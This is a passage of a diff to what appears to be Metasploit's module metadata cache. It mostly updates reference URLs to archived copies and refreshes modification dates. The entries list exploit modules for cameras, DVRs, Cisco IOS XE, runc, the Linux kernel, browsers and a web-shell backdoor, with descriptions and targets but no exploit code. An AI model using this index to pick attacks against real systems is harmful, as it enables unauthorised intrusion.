+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2025-03-03 20:52:55 +0000",
+    "path": "/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/dtale_rce_cve_2025_0655",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/efw_chpasswd_exec": {
    "name": "Endian Firewall Proxy Password Change Command Injection",
    "fullname": "exploit/linux/http/efw_chpasswd_exec",
@@ -75073,7 +75265,7 @@
      "CVE-2021-33552",
      "CVE-2021-33553",
      "CVE-2021-33554",
-      "URL-http://geutebruck.com",
+      "URL-https://www.geutebrueck.com/index.html",
      "URL-https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/",
      "URL-https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
    ],
@@ -75104,7 +75296,7 @@
      "CVE-2021-33553 - testcmd.cgi",
      "CVE-2021-33554 - tmpapp.cgi"
    ],
-    "mod_time": "2022-10-01 17:54:59 +0000",
+    "mod_time": "2025-02-28 11:29:59 +0000",
    "path": "/modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb",
    "is_install_path": true,
    "ref_name": "linux/http/geutebruck_cmdinject_cve_2021_335xx",
@@ -75142,7 +75334,7 @@
    "references": [
      "CVE-2021-33549",
      "URL-https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/",
-      "URL-http://geutebruck.com",
+      "URL-https://www.geutebrueck.com/index.html",
      "URL-https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
    ],
    "platform": "Linux,Unix",
@@ -75166,7 +75358,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-10-01 17:54:59 +0000",
+    "mod_time": "2025-02-28 11:29:59 +0000",
    "path": "/modules/exploits/linux/http/geutebruck_instantrec_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/geutebruck_instantrec_bof",
@@ -75202,7 +75394,7 @@
    "description": "This module exploits an authenticated arbitrary command execution vulnerability within the 'server'\n          GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,\n          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware\n          versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'.\n          Successful exploitation results in remote code execution as the root user.",
    "references": [
      "CVE-2020-16205",
-      "URL-http://geutebruck.com",
+      "URL-https://www.geutebrueck.com/index.html",
      "URL-https://ics-cert.us-cert.gov/advisories/icsa-20-219-03",
      "URL-https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/"
    ],
@@ -75227,7 +75419,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2025-02-28 11:29:59 +0000",
    "path": "/modules/exploits/linux/http/geutebruck_testaction_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/geutebruck_testaction_exec",
@@ -79214,7 +79406,7 @@
    "references": [
      "CVE-2015-1187",
      "BID-72816",
-      "URL-https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2",
+      "URL-http://web.archive.org/web/20180521133927/https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2",
      "URL-https://seclists.org/fulldisclosure/2015/Mar/15",
      "URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052"
    ],
@@ -79240,7 +79432,7 @@
      "Linux mipsel Payload",
      "Linux mipsbe Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/multi_ncc_ping_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/multi_ncc_ping_exec",
@@ -79320,7 +79512,7 @@
    ],
    "description": "This module exploits an unauthenticated remote command execution\n        vulnerability in MVPower digital video recorders. The 'shell' file\n        on the web interface executes arbitrary operating system commands in\n        the query string.\n\n        This module was tested successfully on a MVPower model TV-7104HE with\n        firmware version 1.8.4 115215B9 (Build 2014/11/17).\n\n        The TV-7108HE model is also reportedly affected, but untested.",
    "references": [
-      "URL-https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
+      "URL-http://web.archive.org/web/20200512230920/https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
      "URL-https://www.pentestpartners.com/blog/pwning-cctv-cameras/"
    ],
    "platform": "Linux",
@@ -79344,7 +79536,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/mvpower_dvr_shell_exec",
@@ -80859,7 +81051,7 @@
    "description": "This module exploits a vulnerability in Openfiler v2.x\n        which could be abused to allow authenticated users to execute arbitrary\n        code under the context of the 'openfiler' user. The 'system.html' file\n        uses user controlled data from the 'device' parameter to create a new\n        'NetworkCard' object. The class constructor in 'network.inc' calls exec()\n        with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without\n        providing a system password.",
    "references": [
      "BID-55490",
-      "URL-http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/",
+      "URL-http://web.archive.org/web/20210922060411/https://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/",
      "OSVDB-93881",
      "EDB-21191"
    ],
@@ -80884,7 +81076,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/linux/http/openfiler_networkcard_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/openfiler_networkcard_exec",
@@ -83700,7 +83892,7 @@
      "CVE-2014-8687",
      "EDB-36202",
      "URL-http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/",
-      "URL-https://beyondbinary.io/advisory/seagate-nas-rce/"
+      "URL-http://web.archive.org/web/20150806124553/https://beyondbinary.io/advisory/seagate-nas-rce/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -83723,7 +83915,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/seagate_nas_php_exec_noauth",
@@ -84221,7 +84413,7 @@
    "description": "A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute\n          arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can\n          then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a\n          feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the\n          commands that are able to be executed through the git exec REST API.",
    "references": [
      "CVE-2022-23642",
-      "URL-https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9",
+      "URL-http://web.archive.org/web/20230705082819/https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9",
      "URL-https://github.com/Altelus1/CVE-2022-23642"
    ],
    "platform": "Linux,Unix",
@@ -84247,7 +84439,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2022-07-11 09:48:08 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb",
    "is_install_path": true,
    "ref_name": "linux/http/sourcegraph_gitserver_sshcmd",
@@ -84415,7 +84607,7 @@
      "CVE-2020-28328",
      "EDB-49001",
      "URL-https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/",
-      "URL-https://theyhack.me/SuiteCRM-RCE-2/"
+      "URL-http://web.archive.org/web/20211209044023/https://theyhack.me/SuiteCRM-RCE-2/"
    ],
    "platform": "Linux,Unix",
    "arch": "ARCH_X64, ARCH_CMD, ARCH_X86",
@@ -84439,7 +84631,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2024-06-14 12:05:12 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/suitecrm_log_file_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/suitecrm_log_file_rce",
@@ -86054,8 +86246,8 @@
    "references": [
      "CVE-2020-5847",
      "CVE-2020-5849",
-      "URL-https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/",
-      "URL-https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/"
+      "URL-http://web.archive.org/web/20220520205905/https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/",
+      "URL-http://web.archive.org/web/20230330210936/https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -86078,7 +86270,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/unraid_auth_bypass_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/unraid_auth_bypass_exec",
@@ -86556,7 +86748,7 @@
    "description": "This module exploits an unauthenticated log file upload within the\n          log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6\n          Security Patch 1.\n\n          Successful exploitation will result in RCE as the apache user inside\n          the appacheServer Docker container.",
    "references": [
      "CVE-2021-21978",
-      "URL-https://www.vmware.com/security/advisories/VMSA-2021-0003.html",
+      "URL-http://web.archive.org/web/20240621163557/https://www.vmware.com/security/advisories/VMSA-2021-0003.html",
      "URL-https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece"
    ],
    "platform": "Python",
@@ -86580,7 +86772,7 @@
    "targets": [
      "VMware View Planner 4.6.0"
    ],
-    "mod_time": "2021-03-15 01:33:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/vmware_view_planner_4_6_uploadlog_rce",
@@ -87230,7 +87422,7 @@
    "references": [
      "OSVDB-73609",
      "EDB-17487",
-      "URL-http://www.webidsupport.com/forums/showthread.php?3892"
+      "URL-http://web.archive.org/web/20230206230259/http://www.webidsupport.com/forums/showthread.php?3892"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -87253,7 +87445,7 @@
    "targets": [
      "WeBid 1.0.2 / Ubuntu"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/webid_converter.rb",
    "is_install_path": true,
    "ref_name": "linux/http/webid_converter",
@@ -87723,7 +87915,7 @@
    "description": "This module exploits a vulnerability in ZEN Load Balancer\n        version 2.0 and 3.0-rc1 which could be abused to allow authenticated users\n        to execute arbitrary code under the context of the 'root' user.\n        The 'content2-2.cgi' file uses user controlled data from the 'filelog'\n        parameter within backticks.",
    "references": [
      "OSVDB-85654",
-      "URL-http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/"
+      "URL-http://web.archive.org/web/20221203195056/https://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -87746,7 +87938,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/linux/http/zen_load_balancer_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zen_load_balancer_exec",
@@ -87772,7 +87964,7 @@
    ],
    "description": "This module exploits a command execution vulnerability in Zenoss 3.x\n        which could be abused to allow authenticated users to execute arbitrary\n        code under the context of the 'zenoss' user. The show_daemon_xml_configs()\n        function in the 'ZenossInfo.py' script calls Popen() with user\n        controlled data from the 'daemon' parameter.",
    "references": [
-      "URL-http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/",
+      "URL-http://web.archive.org/web/20221203180334/https://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/",
      "OSVDB-84408"
    ],
    "platform": "Unix",
@@ -87796,7 +87988,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2021-11-22 14:11:03 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
@@ -91196,7 +91388,7 @@
    "description": "A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.\n          This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space.\n          Kernels up to 5.11 (including) are vulnerable.\n          More information about vulnerable kernels is\n          available at https://nvd.nist.gov/vuln/detail/CVE-2021-22555#vulnConfigurationsArea",
    "references": [
      "CVE-2021-22555",
-      "URL-https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html",
+      "URL-http://web.archive.org/web/20250116045131/https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html",
      "URL-https://nvd.nist.gov/vuln/detail/CVE-2021-22555",
      "URL-https://ubuntu.com/security/CVE-2021-22555"
    ],
@@ -91212,7 +91404,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-04-19 20:42:23 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/local/netfilter_xtables_heap_oob_write_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/netfilter_xtables_heap_oob_write_priv_esc",
@@ -92155,7 +92347,7 @@
      "URL-https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/",
      "URL-https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv",
      "URL-https://security-tracker.debian.org/tracker/CVE-2024-21626",
-      "URL-https://ubuntu.com/security/CVE-2024-21626",
+      "URL-http://web.archive.org/web/20241006225740/https://ubuntu.com/security/CVE-2024-21626",
      "CVE-2024-21626"
    ],
    "platform": "Linux",
@@ -92170,7 +92362,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2025-01-09 09:59:09 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/local/runc_cwd_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/runc_cwd_priv_esc",
@@ -92328,9 +92520,9 @@
      "PACKETSTORM-153333",
      "URL-https://github.com/guywhataguy/CVE-2019-12181",
      "URL-https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181",
-      "URL-https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html",
+      "URL-http://web.archive.org/web/20200803153621/https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html",
      "URL-https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm",
-      "URL-https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems"
+      "URL-http://web.archive.org/web/20250208173448/https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems"
    ],
    "platform": "Linux",
    "arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
@@ -92344,7 +92536,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2023-02-02 18:17:02 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -92710,7 +92902,7 @@
      "URL-https://securitytracker.com/id?1024754",
      "URL-https://access.redhat.com/security/cve/cve-2010-4170",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=653604",
-      "URL-https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html",
+      "URL-http://web.archive.org/web/20240609145111/https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html",
      "URL-https://bugs.launchpad.net/bugs/677226",
      "URL-https://www.debian.org/security/2011/dsa-2348"
    ],
@@ -92726,7 +92918,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2023-02-02 18:17:02 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
@@ -93360,7 +93552,7 @@
      "OSVDB-96588",
      "BID-61966",
      "URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
-      "URL-https://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
+      "URL-http://web.archive.org/web/20130831060036/http://www.vmware.com:80/support/support-resources/advisories/VMSA-2013-0010.html",
      "URL-https://www.rapid7.com/blog/post/2013/09/05/cve-2013-1662-vmware-mount-exploit"
    ],
    "platform": "Linux",
@@ -93375,7 +93567,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-10-08 09:16:57 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/local/vmware_mount.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vmware_mount",
@@ -94055,7 +94247,7 @@
      "CVE-2023-20198",
      "CVE-2023-20273",
      "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z",
-      "URL-https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
+      "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
      "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml",
      "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/",
      "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/",
@@ -94084,7 +94276,7 @@
      "Linux Command",
      "Unix Command"
    ],
-    "mod_time": "2024-04-15 11:06:50 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/misc/cisco_ios_xe_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/cisco_ios_xe_rce",
@@ -96260,7 +96452,7 @@
      "URL-https://www.lua.org/pil/8.2.html",
      "URL-https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce",
      "URL-https://www.debian.org/security/2022/dsa-5081",
-      "URL-https://ubuntu.com/security/CVE-2022-0543"
+      "URL-http://web.archive.org/web/20240910172732/https://ubuntu.com/security/CVE-2022-0543"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd, x86, x64",
@@ -96275,7 +96467,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2023-02-08 15:20:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_debian_sandbox_escape",
@@ -97405,7 +97597,7 @@
    "description": "This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH\n          service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n          vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n          This module was tested against SolarWinds LEM v6.3.1.",
    "references": [
      "CVE-2017-7722",
-      "URL-http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
+      "URL-http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
    ],
    "platform": "Python",
    "arch": "python",
@@ -97419,7 +97611,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-01-31 23:59:22 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -97787,7 +97979,7 @@
      "URL-https://github.com/phikshun/ufuzz",
      "URL-https://gist.github.com/phikshun/10900566",
      "URL-https://gist.github.com/phikshun/9984624",
-      "URL-https://www.crock-pot.com/wemo-landing-page.html",
+      "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html",
      "URL-https://www.belkin.com/us/support-article?articleNum=101177",
      "URL-http://www.wemo.com/"
    ],
@@ -97813,7 +98005,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2023-04-04 09:48:51 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -98264,7 +98456,7 @@
    "description": "This module exploits an use after free on Adobe Flash Player. The vulnerability,\n        discovered by Hacking Team and made public as part of the July 2015 data leak, was\n        described as an Use After Free while handling the opaqueBackground property\n        7 setter of the flash.display.DisplayObject class. This module is an early release\n        tested on:\n\n        Windows XP SP3, IE8 and Flash 18.0.0.194,\n        Windows XP SP3, IE 8 and Flash 18.0.0.203,\n        Windows XP SP3, Firefox and Flash 18.0.0.203,\n        Windows Vista SP2 + IE 9 and Flash 18.0.0.203,\n        Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n        Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\n        Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n        windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,\n        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and\n        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194\n        Windows 10 Build 10240 (32-bit) IE11, Firefox 39.0 and Adobe Flash 18.0.0.203",
    "references": [
      "CVE-2015-5122",
-      "URL-https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html",
+      "URL-http://web.archive.org/web/20160508075917/https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html",
      "URL-https://helpx.adobe.com/security/products/flash-player/apsa15-04.html",
      "URL-https://helpx.adobe.com/security/products/flash-player/apsb15-18.html"
    ],
@@ -98280,7 +98472,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/adobe_flash_opaque_background_uaf",
@@ -98551,7 +98743,7 @@
    "description": "This module exploits an issue in the V8 engine on x86_x64 builds of Google Chrome before 89.0.4389.128/90.0.4430.72\n          when handling XOR operations in JIT'd JavaScript code. Successful exploitation allows an attacker to execute\n          arbitrary code within the context of the V8 process.\n\n          As the V8 process is normally sandboxed in the default configuration of Google Chrome, the browser must be run with the\n          --no-sandbox option for the payload to work correctly.",
    "references": [
      "CVE-2021-21220",
-      "URL-https://github.com/r4j0x00/exploits/tree/master/chrome-0day",
+      "URL-http://web.archive.org/web/20210508220051/https://github.com/r4j0x00/exploits/tree/master/chrome-0day",
      "URL-https://twitter.com/r4j0x00/status/1382125720344793090",
      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=1196683",
      "URL-https://www.zerodayinitiative.com/advisories/ZDI-21-411/"
@@ -98570,7 +98762,7 @@
      "Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)",
      "macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/chrome_cve_2021_21220_v8_insufficient_validation",
@@ -103880,7 +104072,7 @@
    "references": [
      "URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
      "URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
-      "URL-https://www.exploit-db.com/docs/27654.pdf",
+      "URL-http://web.archive.org/web/20170214000632/https://www.exploit-db.com/docs/27654.pdf",
      "URL-https://www.cisa.gov/uscert/ncas/alerts/TA15-313A"
    ],
    "platform": "PHP",
@@ -103904,7 +104096,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/caidao_php_backdoor_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/caidao_php_backdoor_exec",
@@ -104610,7 +104802,7 @@
      "CVE-2019-3396",
      "URL-https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html",
      "URL-https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/",
-      "URL-https://paper.seebug.org/886/"
+      "URL-http://web.archive.org/web/20231207164611/https://paper.seebug.org/886/"
    ],
    "platform": "",
    "arch": "",
@@ -104635,7 +104827,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2022-07-01 08:43:47 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/confluence_widget_connector.rb",
    "is_install_path": true,
    "ref_name": "multi/http/confluence_widget_connector",
@@ -104873,7 +105065,7 @@
    ],
    "description": "This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.\n        This application has an upload feature that allows an unauthenticated\n        user to upload arbitrary files to the 'upload/___1/' directory\n        and then execute it.",
    "references": [
-      "URL-http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/",
+      "URL-http://web.archive.org/web/20210922054637/https://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/",
      "OSVDB-84829"
    ],
    "platform": "PHP",
@@ -104897,7 +105089,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/multi/http/cuteflow_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/cuteflow_upload_exec",
@@ -105340,7 +105532,7 @@
    "references": [
      "OSVDB-88751",
      "BID-57058",
-      "URL-http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability",
+      "URL-http://web.archive.org/web/20230128023508/https://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability/",
      "URL-http://extplorer.net/issues/105"
    ],
    "platform": "PHP",
@@ -105364,7 +105556,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/extplorer_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/extplorer_upload_exec",
@@ -105930,7 +106122,7 @@
      "URL-http://article.gmane.org/gmane.linux.kernel/1853266",
      "URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
      "URL-https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/",
-      "URL-http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29",
+      "URL-http://web.archive.org/web/20221226100335/https://mercurial.selenic.com/wiki/WhatsNew",
      "URL-http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e",
      "URL-http://selenic.com/repo/hg-stable/rev/6dad422ecc5a"
    ],
@@ -105947,7 +106139,7 @@
      "Automatic",
      "Windows Powershell"
    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/git_client_command_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/git_client_command_exec",
@@ -106208,7 +106400,7 @@
      "CVE-2020-14144",
      "EDB-49571",
      "URL-https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/",
